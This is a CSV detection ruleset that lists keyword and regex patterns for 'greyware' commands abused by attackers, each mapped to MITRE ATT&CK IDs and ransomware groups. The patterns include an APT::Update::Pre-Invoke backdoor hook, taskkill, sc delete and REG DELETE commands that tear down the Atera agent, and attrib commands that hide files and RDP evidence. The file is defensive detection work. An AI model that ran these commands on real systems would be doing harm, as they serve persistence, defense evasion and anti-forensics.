"*APT::Update::Pre-Invoke *}*",".{0,1000}APT\:\:Update\:\:Pre\-Invoke\s.{0,1000}\}.{0,1000}","greyware_tool_keyword","APT","linux commands abused by attackers - backdoor apt execute a command when invoking apt","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Exploitation tool","N/A","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"*""C:\Windows\system32\ARP.EXE"" /a*",".{0,1000}\""C\:\\Windows\\system32\\ARP\.EXE\""\s\/a.{0,1000}","greyware_tool_keyword","arp","Arp displays and modifies information about a system's Address Resolution Protocol (ARP) cache","T1018","T1016","N/A","Turla - APT32 - Orangeworm","Discovery","N/A","1","0","N/A","N/A","5","7","N/A","N/A","N/A","N/A"
"*assoc *findstr *=cm*",".{0,1000}assoc\s.{0,1000}findstr\s.{0,1000}\=cm.{0,1000}","greyware_tool_keyword","assoc","will return the file association for file extensions that include the string =cm - hidden objectif is to find .cdxml association","T1033 - T1059 - T1083","TA0007 - TA0002","N/A","N/A","Reconnaissance","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
"*assoc *findstr *lCmd*",".{0,1000}assoc\s.{0,1000}findstr\s.{0,1000}lCmd.{0,1000}","greyware_tool_keyword","assoc","will return the file association for file extensions that include the string lCmd - hidden objectif is to find .cdxml association","T1033 - T1059 - T1083","TA0007 - TA0002","N/A","N/A","Reconnaissance","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
"*assoc *findstr *mdf*",".{0,1000}assoc\s.{0,1000}findstr\s.{0,1000}mdf.{0,1000}","greyware_tool_keyword","assoc","will return the file association for file extensions that include the string mdf - hidden objectif is to find cmdfile association","T1033 - T1059 - T1083","TA0007 - TA0002","N/A","N/A","Reconnaissance","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
"*assoc *findstr *s1x*",".{0,1000}assoc\s.{0,1000}findstr\s.{0,1000}s1x.{0,1000}","greyware_tool_keyword","assoc","will return the file association for file extensions that include the string s1x - hidden objectif is to find .ps1xml association","T1033 - T1059 - T1083","TA0007 - TA0002","N/A","N/A","Reconnaissance","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
"*assoc *findstr =cm*",".{0,1000}assoc\s.{0,1000}findstr\s\=cm.{0,1000}","greyware_tool_keyword","assoc","will return the file association for file extensions that include the string =cm - hidden objectif is to find .cdxml association","T1033 - T1059 - T1083","TA0007 - TA0002","N/A","N/A","Reconnaissance","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
"*assoc *findstr lCmd*",".{0,1000}assoc\s.{0,1000}findstr\slCmd.{0,1000}","greyware_tool_keyword","assoc","will return the file association for file extensions that include the string lCmd - hidden objectif is to find .cdxml association","T1033 - T1059 - T1083","TA0007 - TA0002","N/A","N/A","Reconnaissance","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
"*assoc *findstr mdf*",".{0,1000}assoc\s.{0,1000}findstr\smdf.{0,1000}","greyware_tool_keyword","assoc","will return the file association for file extensions that include the string mdf - hidden objectif is to find cmdfile association","T1033 - T1059 - T1083","TA0007 - TA0002","N/A","N/A","Reconnaissance","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
"*assoc *findstr s1x*",".{0,1000}assoc\s.{0,1000}findstr\ss1x.{0,1000}","greyware_tool_keyword","assoc","will return the file association for file extensions that include the string s1x - hidden objectif is to find .ps1xml association","T1033 - T1059 - T1083","TA0007 - TA0002","N/A","N/A","Reconnaissance","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
"*jajilbjjinjmgcibalaakngmkilboobh*",".{0,1000}jajilbjjinjmgcibalaakngmkilboobh.{0,1000}","greyware_tool_keyword","Astar VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"*/Agent/AcknowledgeCommands/*",".{0,1000}\/Agent\/AcknowledgeCommands\/.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://www.atera.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/Agent/GetCommandsFallback/*",".{0,1000}\/Agent\/GetCommandsFallback\/.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://www.atera.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/Agent/GetEnvironmentStatus/*",".{0,1000}\/Agent\/GetEnvironmentStatus\/.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://www.atera.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/Agent/GetRecurringPackages/*",".{0,1000}\/Agent\/GetRecurringPackages\/.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://www.atera.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\AlphaControlAgent\obj\Release\AteraAgent.pdb*",".{0,1000}\\AlphaControlAgent\\obj\\Release\\AteraAgent\.pdb.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://www.atera.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\atera_agent.exe*",".{0,1000}\\atera_agent\.exe.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://www.atera.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Program Files (x86)\Atera Networks*",".{0,1000}\\Program\sFiles\s\(x86\)\\Atera\sNetworks.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://www.atera.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Program Files\Atera Networks*",".{0,1000}\\Program\sFiles\\Atera\sNetworks.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://www.atera.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Services\AteraAgent*",".{0,1000}\\Services\\AteraAgent.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://www.atera.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\TEMP\AteraUpgradeAgentPackage\*",".{0,1000}\\TEMP\\AteraUpgradeAgentPackage\\.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://www.atera.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*>Atera Networks<*",".{0,1000}\>Atera\sNetworks\<.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://www.atera.com/","1","0","#companyname","N/A","10","10","N/A","N/A","N/A","N/A"
"*acontrol.atera.com*",".{0,1000}acontrol\.atera\.com.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://www.atera.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*agent-api.atera.com*",".{0,1000}agent\-api\.atera\.com.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://www.atera.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*AgentPackageInternalPooler\log.txt*",".{0,1000}AgentPackageInternalPooler\\log\.txt.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://www.atera.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*AgentPackageRunCommandInteractive\log.txt*",".{0,1000}AgentPackageRunCommandInteractive\\log\.txt.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://www.atera.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*AlphaControlAgent.CloudLogsManager+<>*",".{0,1000}AlphaControlAgent\.CloudLogsManager\+\<\>.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://www.atera.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*atera_del.bat*",".{0,1000}atera_del\.bat.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://www.atera.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*atera_del2.bat*",".{0,1000}atera_del2\.bat.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://www.atera.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*AteraAgent*AgentPackageRunCommandInteractive.exe*",".{0,1000}AteraAgent.{0,1000}AgentPackageRunCommandInteractive\.exe.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://thedfirreport.com/2023/09/25/from-screenconnect-to-hive-ransomware-in-61-hours/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*AteraSetupLog.txt*",".{0,1000}AteraSetupLog\.txt.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://www.atera.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*HKEY_CURRENT_USER\Software\ATERA Networks*",".{0,1000}HKEY_CURRENT_USER\\Software\\ATERA\sNetworks.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://www.atera.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*HKEY_LOCAL_MACHINE\SOFTWARE\ATERA Networks*",".{0,1000}HKEY_LOCAL_MACHINE\\SOFTWARE\\ATERA\sNetworks.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://www.atera.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*http*/agent-api-*.atera.com*",".{0,1000}http.{0,1000}\/agent\-api\-.{0,1000}\.atera\.com.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://www.atera.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Monitoring & Management Agent by ATERA*",".{0,1000}Monitoring\s\&\sManagement\sAgent\sby\sATERA.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://www.atera.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*REG DELETE ""HKEY_CLASSES_ROOT\Installer\Products\10F15BFE50893924BB61F671FEC4D2EF"" /f*",".{0,1000}REG\sDELETE\s\""HKEY_CLASSES_ROOT\\Installer\\Products\\10F15BFE50893924BB61F671FEC4D2EF\""\s\/f.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*REG DELETE ""HKEY_CLASSES_ROOT\Installer\Products\4758948C95C1B194AB15204D95B42292"" /f*",".{0,1000}REG\sDELETE\s\""HKEY_CLASSES_ROOT\\Installer\\Products\\4758948C95C1B194AB15204D95B42292\""\s\/f.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc delete AteraAgent*",".{0,1000}sc\sdelete\sAteraAgent.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://www.atera.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc start AteraAgent*",".{0,1000}sc\sstart\sAteraAgent.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://www.atera.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc stop AteraAgent*",".{0,1000}sc\sstop\sAteraAgent.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://www.atera.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*SOFTWARE\ATERA Networks\AlphaAgent*",".{0,1000}SOFTWARE\\ATERA\sNetworks\\AlphaAgent.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://www.atera.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*taskkill /f /im AgentPackageAgentInformation.exe*",".{0,1000}taskkill\s\/f\s\/im\sAgentPackageAgentInformation\.exe.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://www.atera.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*taskkill /f /im AgentPackageEventViewer.exe*",".{0,1000}taskkill\s\/f\s\/im\sAgentPackageEventViewer\.exe.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://www.atera.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*taskkill /f /im AgentPackageHeartbeat.exe*",".{0,1000}taskkill\s\/f\s\/im\sAgentPackageHeartbeat\.exe.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://www.atera.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*taskkill /f /im AgentPackageInformation*",".{0,1000}taskkill\s\/f\s\/im\sAgentPackageInformation.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://www.atera.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*taskkill /f /im AgentPackageInternalPoller.exe*",".{0,1000}taskkill\s\/f\s\/im\sAgentPackageInternalPoller\.exe.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://www.atera.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*taskkill /f /im AgentPackageMonitoring*",".{0,1000}taskkill\s\/f\s\/im\sAgentPackageMonitoring.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://www.atera.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*taskkill /f /im AgentPackageProgramManagement*",".{0,1000}taskkill\s\/f\s\/im\sAgentPackageProgramManagement.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://www.atera.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*taskkill /f /im AgentPackageRegistryExplorer.exe*",".{0,1000}taskkill\s\/f\s\/im\sAgentPackageRegistryExplorer\.exe.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://www.atera.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*taskkill /f /im AgentPackageRunCommande.exe*",".{0,1000}taskkill\s\/f\s\/im\sAgentPackageRunCommande\.exe.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://www.atera.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*taskkill /f /im AgentPackageRunCommandInteractive*",".{0,1000}taskkill\s\/f\s\/im\sAgentPackageRunCommandInteractive.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://www.atera.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*taskkill /f /im AgentPackageSTRemote.exe*",".{0,1000}taskkill\s\/f\s\/im\sAgentPackageSTRemote\.exe.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://www.atera.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*taskkill /f /im AgentPackageSystemTools.exe*",".{0,1000}taskkill\s\/f\s\/im\sAgentPackageSystemTools\.exe.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://www.atera.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*taskkill /f /im AgentPackageUpgradeAgent*",".{0,1000}taskkill\s\/f\s\/im\sAgentPackageUpgradeAgent.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://www.atera.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*taskkill /f /im AgentPackageWindowsUpdate.exe*",".{0,1000}taskkill\s\/f\s\/im\sAgentPackageWindowsUpdate\.exe.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://www.atera.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*taskkill /f /im AteraAgent.exe*",".{0,1000}taskkill\s\/f\s\/im\sAteraAgent\.exe.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://www.atera.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*taskkill /f /im TicketingTray.exe*",".{0,1000}taskkill\s\/f\s\/im\sTicketingTray\.exe.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://www.atera.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\attrib.exe* +H *",".{0,1000}\\attrib\.exe.{0,1000}\s\+H\s.{0,1000}","greyware_tool_keyword","attrib","command aiming to hide a file.  It can be performed with attrib.exe on a WINDOWS machine with command option +h ","T1562.001","TA0040 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","2","8","N/A","N/A","N/A","N/A"
"*attrib *.rdp -s -h",".{0,1000}attrib\s.{0,1000}\.rdp\s\-s\s\-h","greyware_tool_keyword","attrib","hide evidence of RDP connections","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/xiaoy-sec/Pentest_Note/blob/52156f816f0c2497c25343c2e872130193acca80/wiki/%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87/Windows%E6%8F%90%E6%9D%83/RDP%26Firewall/%E5%88%A0%E9%99%A4%E7%97%95%E8%BF%B9.md?plain=1#L4","1","0","N/A","N/A","10","10","3635","918","2023-05-22T03:50:57Z","2020-06-15T02:58:36Z"
"*attrib +s +h /D ""C:\Program Files\Windows NT\*",".{0,1000}attrib\s\+s\s\+h\s\/D\s\""C\:\\Program\sFiles\\Windows\sNT\\.{0,1000}","greyware_tool_keyword","attrib","defense evasion - hidding in suspicious directory","T1564.001","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*attrib +s +h /D ""C:\users\Public\*",".{0,1000}attrib\s\+s\s\+h\s\/D\s\""C\:\\users\\Public\\.{0,1000}","greyware_tool_keyword","attrib","defense evasion - hidding in suspicious directory","T1564.001","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*attrib +s +h desktop.ini*",".{0,1000}attrib\s\+s\s\+h\sdesktop\.ini.{0,1000}","greyware_tool_keyword","attrib","NTLM Leak via Desktop.ini","T1564.001","TA0005","N/A","N/A","Credential Access","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Anti-Forensics.md","1","0","N/A","N/A","N/A","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z"
